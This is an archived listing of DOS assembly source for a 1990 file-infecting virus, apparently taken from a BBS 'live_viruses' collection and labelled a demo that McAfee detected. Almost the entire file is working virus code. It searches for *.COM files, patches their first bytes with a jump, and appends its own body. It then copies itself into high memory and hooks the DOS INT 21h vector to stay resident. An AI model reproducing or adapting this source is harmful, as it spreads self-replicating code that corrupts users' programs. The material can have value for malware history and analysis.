home *** CD-ROM | disk | FTP | other *** search

---

/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / live_viruses / virus_collections / virold.asm

< prev

next >

Wrap

Assembly Source File  |  1990-02-21  |  7KB  |  432 lines

---

1.  
2. ;*****************************************************************************
3. ;                        VIRUS  DEMO (the one that macafee found)
4. ;-----------------------------------------------------------------------------
5.  
6. len    equ    01dch
7.  
8.  
9.  
10. ;-----------------------------------------------------------------------------
11. ;                    FIND FIRST FILE
12. ;-----------------------------------------------------------------------------
13. jmp    con
14. cmp    ah,3dh
15. je    con
16. cmp    ah,0fh
17. je     con
18. int    70h
19. iret
20.  
21. con:    push    ax
22. push    ds
23. push    dx
24.  
25.  
26. mov    ah,1ah
27. mov    dx,cs
28. mov    ds,dx
29. mov    dx,offset buff
30. int    70h
31.  
32. mov    ah,4eh
33. mov    cx,0
34. mov    dx,cs
35. mov    ds,dx
36. mov    dx,offset fname
37. int    70h
38. jc    error1
39.  
40. ;
41. ;push    cs
42. ;pop    ds
43. ;mov    dx,offset buff
44. ;mov    ah,9
45. ;int    70h
46. ;
47.  
48.  
49. ;-----------------------------------------------------------------------------
50. ;            FIND FILE SIZE
51. ;-----------------------------------------------------------------------------
52.  
53.  
54. mov    ah,3dh
55. mov    al,2
56. mov    dx,cs
57. mov    ds,dx
58. mov    dx,offset buff
59. add    dx,30
60. int    70h
61. jc    error1
62. mov    fhandle,ax
63.  
64. mov    ah,42h
65. mov    al,2
66. mov    bx,fhandle
67. mov    cx,0
68. mov    dx,0
69. int    70h
70. jc    error1
71.  
72. push    ax
73. ;------------------------------------
74. ;    close
75. ;-----------------------------------
76. ;mov    ah,3eh
77. ;mov    bx,fhandle
78. ;int    70h
79. ;jc    error1
80.  
81. jmp    cont
82.  
83. ;-----------------------------------------------------------------------------
84. ;        NOT    FAR    ERROR
85. ;-----------------------------------------------------------------------------
86.  
87. error1: mov    ah,4ch
88.     mov    al,1
89.     int    70h
90.  
91.  
92. ;-----------------------------------------------------------------------------
93. ;                PUT THE CALL INSTRUCTION CODE IN BUFF
94. ;-----------------------------------------------------------------------------
95.  
96. cont:    sub ax,3    ;find the disp for the jump code
97. mov    buff+1,al
98. mov    buff+2,ah
99. mov    ax,00e8h
100. mov    buff,al
101.  
102. ;-----------------------------------------------------------------------------
103. ;        READ THE 3 FIRST BYTES FROM THE FILE
104. ;-----------------------------------------------------------------------------
105.  
106. mov    ah,42h
107. mov    al,0
108. mov    bx,fhandle
109. mov    cx,0
110. mov    dx,0
111. int    70h
112. jc    error1
113.  
114.  
115. mov    ah,3fh
116. mov    dx,cs
117. mov    ds,dx
118. mov    dx,offset buff
119. add    dx,3
120. mov    bx,fhandle
121. mov    cx,3
122. int    70h
123. jc    error1
124. cmp    ax,cx
125. jl    error1
126.  
127.  
128. ;-----------------------------------------------------------------------------
129. ;            MOVE 3 BYTES FROM BUFF+3 TO dat1-3
130. ;-----------------------------------------------------------------------------
131.  
132. mov    al,buff+3
133. mov    dat1,al
134. mov    al,buff+4
135. mov    dat2,al
136. mov    al,buff+5
137. mov    dat3,al
138.  
139. ;-----------------------------------------------------------------------------
140. ;         WRITE THE JMP INSTRUCTION TO THE DISK
141. ;-----------------------------------------------------------------------------
142.  
143.  
144. mov    ah,42h
145. mov    al,0
146. mov    bx,fhandle
147. mov    cx,0
148. mov    dx,0
149. int    70h
150. jc    error1
151.  
152.  
153. mov    ah,40h
154. mov    dx,cs
155. mov    ds,dx
156. mov    dx,offset buff
157. mov    bx,fhandle
158. mov    cx,3
159. int    70h
160. jc    error
161. cmp    ax,3
162. jne    error
163.  
164.  
165.  
166. ;mov    ah,0fh
167. ;mov    dx,cs
168. ;mov    ds,dx
169. ;mov    dx,offset myfcb
170. ;int    70h
171. ;or    al,al
172. ;jnz    error1
173. ;
174. ;mov    dx,offset buff
175. ;mov    ah,1ah
176. ;int    70h
177. ;
178. ;mov    word ptr myfcb+0eh,3
179. ;
180. ;mov     word ptr myfcb+21h,0
181. ;mov    word ptr myfcb+23h,0
182. ;
183. ;mov    ah,22h
184. ;mov    dx,offset myfcb
185. ;int    70h
186. ;or    al,al
187. ;jnz    error1
188.  
189. ;mov    ah,10h
190. ;mov     dx,offset myfcb
191. ;int    70h
192. ;or    al,al
193. ;jnz    error
194.  
195. ;-----------------------------------------------------------------------------
196. ;    CALCULATE THE START ADDRESS OF THE VIRUS DATA ITSELF
197. ;-----------------------------------------------------------------------------
198.  
199. pop     ax
200. add    ax,16bh
201. mov    sdat1,al
202. mov    sdat1+1,ah
203.  
204.  
205. ;-----------------------------------------------------------------------------
206. ;            CLEAR   FCB
207. ;-----------------------------------------------------------------------------
208.  
209.  
210.  
211. ;mov    cx,7
212. ;mov    si,offset fname
213. ;mov    di,offset fn
214. ;mov    dx,cs
215. ;mov    ds,dx
216. ;mov    dx,cs
217. ;mov    es,dx
218. ;rep movsb
219.  
220.  
221.  
222. ;-----------------------------------------------------------------------------
223. ;            WRITE THE VIRUS PREFIX TO DISK
224. ;-----------------------------------------------------------------------------
225.  
226. ;mov    ah,3dh
227. ;mov    al,2
228. ;mov    dx,cs
229. ;mov    ds,dx
230. ;mov    dx,offset fn
231. ;int    70h
232. ;jc    error
233. ;mov    fhandle,ax
234.  
235. mov    ah,42h
236. mov    al,2
237. mov    bx,fhandle
238. mov    cx,0
239. mov    dx,0
240. int    70h
241. jc    error
242.  
243. mov    ah,40h
244. mov    dx,cs
245. mov    ds,dx
246. mov    dx,offset data
247. mov    bx,fhandle
248. mov    cx,006bh
249. int    70h
250. jc    error
251. cmp    ax,006bh
252. jne    error
253.  
254.  
255. ;----------------------------------------------------------------------------
256. ;
257. ;----------------------------------------------------------------------------
258.  
259. mov    ah,40h
260. mov    dx,cs
261. mov    ds,dx
262. mov    dx,0100h
263. mov    bx,fhandle
264. mov    cx,len
265. int    70h
266. jc    error
267. cmp    ax,len
268. jne    error
269.  
270.  
271.  
272.  
273. ;-----------------------------------------------------------------------------
274. ;            CLOSE FILE
275. ;-----------------------------------------------------------------------------
276.  
277. mov    ah,3eh
278. mov    bx,fhandle
279. int    70h
280. jc    error
281.  
282.  
283. ;-----------------------------------------------------------------------------
284.  
285. ;-----------------------------------------------------------------------------
286. ;            WRITE THE VIRUS TO DISK
287. ;-----------------------------------------------------------------------------
288. ;jmp error
289. ;mov    ah,15h
290. ;mov    dx,cs
291. ;mov    ds,dx
292. ;mov    dx,offset myfcb
293. ;
294. ;mov    word ptr myfcb+0eh,len
295. ;int    70h
296. ;or    al,al
297. ;jnz    error
298. ;
299. ;-----------------------------------------------------------------------------
300. ;                CLOSE THE FILE
301. ;-----------------------------------------------------------------------------
302. ;
303. ;mov    ah,10h
304. ;mov    dx,cs
305. ;mov    ds,dx
306. ;mov    dx,offset myfcb
307. ;int    70h
308. ;or    al,al
309. ;jnz    error
310.  
311. pop    dx
312. pop    ds
313. pop    ax
314.  
315. int    70h
316.  
317. iret
318.  
319.  
320.  
321.  
322. ;*****************************************************************************
323. ;                  DATA SECTION
324. ;-----------------------------------------------------------------------------
325.  
326. error:    mov     ah,4ch
327.     mov    al,1
328.     int    70h
329.  
330.  
331.  
332. buff    db    43 dup (0)
333. fname    db    "*.COM",0
334.  
335. fhandle dw    ?
336.  
337.  
338. data    db    198,6,0,1
339. dat1    db    0
340. datb    db    198,6,1,1
341. dat2    db    0
342. datc    db    198,6,2,1
343. dat3    db    0
344.  
345.  
346. pop    bx    ;change the call data to 100h
347. mov    bx,100h
348. push    bx
349.  
350.  
351. push    ax
352. push    ds
353. push    es
354.  
355.  
356.  
357. mov     cx,len
358. source    db    190    ;MOV SI,OFFSET SOURCE
359. sdat1    db    0,0
360. mov     di,100h
361. mov    dx,cs
362. mov    ds,dx
363. mov    dx,9800h
364. mov    es,dx
365. rep movsb
366.  
367.  
368.  
369. ;a    db    154,0,1,0,128    ; CALL 9800:0100
370. ;--------------------------------------------------------------------------
371. ;        PUT INT 21H VECT. TO INT 70H
372. ;--------------------------------------------------------------------------
373. push    ds
374. mov    ax,0
375. mov    ds,ax
376. push     [84h]
377. pop     [1c0h]
378.  
379. push    [85h]
380. pop    [1c1h]
381.  
382. push    [86h]
383. pop    [1c2h]
384.  
385. push    [87h]
386. pop    [1c3h]
387.  
388. ;------------------------------------------------------------------------
389. ;        HOOK THE VIRUS TO INT 21
390. ;------------------------------------------------------------------------
391.  
392.  
393. ;push    [84h]    ;IP
394. ;push    [85h]    ;IP
395. ;push    [86h]    ;CS
396. ;push    [87h]    ;CS
397.  
398. ;mov    dx,9800h
399. ;mov    ds,dx
400. ; put the jump instruction at the end of virus
401. ;mov    al,234
402. ;mov     gen,al ;check if it`s 200h
403. ;pop    al
404. ;mov    gen+4,al
405. ;pop    al
406. ;mov    gen+3,al
407. ;pop    al
408. ;mov    gen+2,al
409. ;pop    al
410. ;mov    gen+1,al
411.  
412. ; hook the virus
413. mov    dx,0
414. mov    ds,dx
415. mov    ax,100h
416. mov    [84h],ax
417. mov    ax,9800h
418. mov    [86h],ax
419. pop    ds
420.  
421. ;-----------------------------------------------------------------------
422. ;
423. ;-----------------------------------------------------------------------
424. mov    ah,0fh
425. int    21h
426.  
427. pop es
428. pop ds
429. pop ax
430.  
431. ret
432.